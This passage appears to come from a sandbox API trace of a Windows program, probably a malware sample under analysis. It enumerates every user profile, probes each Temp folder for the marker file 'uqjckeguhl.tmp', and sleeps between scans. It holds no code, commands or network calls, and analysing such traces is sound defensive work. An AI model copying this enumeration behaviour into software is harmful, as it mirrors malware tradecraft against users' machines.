	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.573] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] GetLastError () returned 0x7a
	[0080.574] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0080.574] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.574] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.575] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0080.576] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.576] FindNextFileW (in: hFindFile=0x726dc0, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.576] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0080.577] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.577] GetLastError () returned 0x3
	[0080.578] GetLastError () returned 0x3
	[0080.578] GetLastError () returned 0x3
	[0080.578] GetLastError () returned 0x3
	[0080.578] GetLastError () returned 0x3
	[0080.578] GetLastError () returned 0x3
	[0080.578] GetLastError () returned 0x3
	[0080.578] GetLastError () returned 0x3
	[0080.578] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0080.578] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.579] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0080.579] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.580] FindNextFileW (in: hFindFile=0x726dc0, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0080.580] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0080.580] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.582] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0080.582] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.583] FindNextFileW (in: hFindFile=0x726dc0, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0080.583] FindNextFileW (in: hFindFile=0x726dc0, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0080.583] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0080.583] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.583] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0080.584] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.584] FindNextFileW (in: hFindFile=0x726dc0, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0080.584] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0080.584] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.584] wsprintfW (in: param_1=0x7724b0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0080.584] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0080.584] FindNextFileW (in: hFindFile=0x726dc0, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 0
	[0080.584] FindClose (in: hFindFile=0x726dc0 | out: hFindFile=0x726dc0) returned 1
	[0080.585] Sleep (dwMilliseconds=0x1388) 
	[0085.655] GetProfilesDirectoryW () returned 0x0
	[0085.681] GetProfilesDirectoryW () returned 0x1
	[0085.681] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 0x392ac60
	[0085.681] GetLastError () returned 0x7a
	[0085.681] GetLastError () returned 0x7a
	[0085.681] GetLastError () returned 0x7a
	[0085.681] GetLastError () returned 0x7a
	[0085.681] GetLastError () returned 0x7a
	[0085.681] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0085.682] FindNextFileW (in: hFindFile=0x392ac60, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] GetLastError () returned 0x7a
	[0085.682] lstrcmpW (lpString1="..", lpString2=".") returned 1
	[0085.682] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0085.683] FindNextFileW (in: hFindFile=0x392ac60, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0085.683] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.683] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.684] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.685] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.686] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
